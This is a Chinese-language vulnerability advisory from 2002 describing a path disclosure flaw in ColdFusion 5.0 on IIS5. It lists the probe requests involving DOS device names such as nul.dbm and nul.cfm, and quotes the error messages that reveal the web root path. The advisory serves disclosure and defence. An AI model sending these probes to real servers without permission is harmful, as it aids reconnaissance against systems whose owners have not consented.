Coldfusion存在路径泄露漏洞发布时间:2002-04-20 更新时间:2002-04-20 严重程度:中 威胁程度:服务器信息泄露 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Coldfusion 5.0 on Windows 2000 w. IIS5详细描述 请求部分DOS设备文件当被ISAPI过滤器处理时,会导致返回包含WEB路径的错误信息。 测试代码 请求不存在的.cfm 和.dbm文件会返回类似信息: "Error Occurred While Processing Request Error Diagnostic Information An error has occurred. HTTP/1.0 404 Object Not Found" 请求nul.dbm或者nul.cfm 的DOS设备名会显示: "Error Occurred While Processing Request Error Diagnostic Information Cannot open CFML file The requested file "C:\data\nul.dbm" cannot be found. The specific sequence of files included or processed is: C:\data\nul.dbm Date/Time: 04/18/02 11:32:16 Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461) Remote Address: xxx.xxx.xxx.xxx" 请求/nul..dbm名字会出现如下信息: "Error Occurred While Processing Request Error Diagnostic Information The template specification, 'C:\data\nul..dbm', is illegal. Template specifications cannot include '..' nor begin with a backslash ('\\')." 解决方案 尚无 相关信息 Peter Gründl (pgrundl@kpmg.dk) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-04/0235.html |
